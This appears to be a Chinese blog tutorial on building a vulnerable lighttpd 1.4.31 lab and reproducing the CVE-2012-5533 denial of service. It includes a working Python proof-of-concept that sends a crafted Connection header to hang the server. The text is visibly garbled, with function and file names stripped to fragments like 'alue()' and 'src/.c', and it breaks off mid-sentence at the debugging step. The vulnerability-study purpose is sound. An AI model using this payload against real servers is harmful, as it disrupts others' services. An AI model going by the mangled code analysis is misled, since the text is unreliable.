lighttpd漏洞环境搭建与拒绝服务复现

网安智编厦门萤点网络科技 2026-04-15 00:11 1 0

预估稿费：投稿方式：发送邮件至#，或登陆网页版在线投稿一．域处理拒绝服务漏洞的环境搭建 1）安装因为此漏洞需要固定版本,因此我们需要手动安装。 wget http://download.lighttpd.net/lighttpd/re...

预估稿费：

投稿方式：发送邮件至#，或登陆网页版在线投稿

一．域处理拒绝服务漏洞的环境搭建

1）安装

因为此漏洞需要固定版本,因此我们需要手动安装。

wget http://download.lighttpd.net/lighttpd/releases-1.4.x/ lighttpd-1.4.31.tar.gz 
tar -zxvf lighttpd-1.4.31.tar.gz
cd lighttpd-1.4.31

到这步时，接下来就是执行

./configure

命令，但是在这步可能会出现以下错误：

configure: error: pcre-config not found, install the pcre-devel package or bui with --without-pcre

我们需要执行：

yum install gcc glib2-devel openssl-devel pcre-devel bzip2-devel gzip-devel zlib-devel

来更新缺失的关联包

安装完毕后，继续执行

./configure
make && make install

编译完毕后，执行步骤二。

2）拷贝的执行文件

创建默认文件：

mkdir lighttpd-test
cd lighttpd-test

拷贝：

cp /usr/local/sbin/lighttpd home/lighttpd-test/

3) 创建配置文件

vim lighttpd.conf

编写：

server.document-root="/var/www/" 
server.port = 8080
server.username = "www" 
server.groupname = "www" 
mimetype.assign = (
   ".html" => "text/html", 
   ".txt" => "text/plain",
   ".jpg" => "image/jpeg",
   ".png" => "image/png" 
)
static-file.exclude-extensions = ( ".fcgi", ".php", ".rb", "~", ".inc" )
index-file.names = ( "index.html" )

4）自己编写欢迎页面(index.html)

vim /var/www/index.html


</span><span class="pln">Hello</span><span class="tag">

This is a test

5）开启防火墙，启动服务

开启防火墙：

iptables -I INPUT -p tcp --dport 8080 -j ACCEPT

启动服务：

./lighttpd -f lighttpd.conf

注意：启动服务这里必须是绝对路径，也可自己去添加下环境变量（这里的路径是home/-test/）。

启动完后显示。

接下来，可以进入浏览器测试了：

http://127.0.0.1:8080

OK,加载后就会显示我们自己编写的欢迎页面。

二．拒绝服务漏洞原理及复现

lighttpd拒绝服务漏洞原理及复现_bash漏洞利用攻击代码_lighttpd域处理拒绝服务漏洞环境搭建

1）原理：漏洞描述:CVE(CAN) ID: CVE-2012-5533

是一款开源的轻量级Web服务器。

1.4.31在处理某些HTTP请求头时，"alue()"函数(src/.c)在处理特制的""报头域时会陷入无限循环。攻击者利用此漏洞可导致拒绝服务。

2）漏洞复现

漏洞脚本：

此脚本为bash脚本，需要改下权限：

在脚本目录下执行命令：

chmod +x test.sh

然后执行：

./test.sh

好的，执行成功。

附带脚本：

#encoding: utf-8
import socket
if __name__ == '__main__':
    sock=socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.connect(('192.**.**.**',8080))
    sock.send(b'GET/HTTP/1.1\r\nHost: pwn.ed\r\nConnection: TE,,Keep-Alive\r\n\r\n')
    sock.close()
    print('ok')

注释：

命令：

ps aux | grep "light*"

查看服务的进程信息。

top

查看任务管理器

kill -9 PID

杀死某进程

三、动、静结合跟踪漏洞呈现原因

前面我们已知造成漏洞的函数是(src/.c)里面的" alue() "函数，因此我们先找到这个函数位置，在这里我直接将这个函数剪切出来了：

让我们来仔细看看标红的代码，开始进入函数时b肯定是有值的，所以，会进入for循环，起初state为0，所以会进入case 0，然而，咱们仔细看下，其实case 0里面的for循环是没有被执行的。因此在case 0里，直接state=1;break;跳出..case。继续for循环，这时state=1,所以进入case 1中，start=s,然后，这里面for函数里条件不等于‘，’时，i++，然后进入if语句，if语句中条件就是start=s，执行break,因此，又继续for循环，state=1，进入case 1中。

有人说，即使进行for循环，也是有结束的时候啊，那么我们仔细看下第一个for循环，里面i值，其实是根据漏洞利用脚本发送数据而判定的，漏洞脚本里面‘，’前面只有两个字节，所以当等于‘，’时是没有变动的，因此，造成了死循环。

那么，接下来，使用gdb调试器动态调试来验证一下，是不是如我们所说的那样。

运行漏洞利用脚本后，使用命令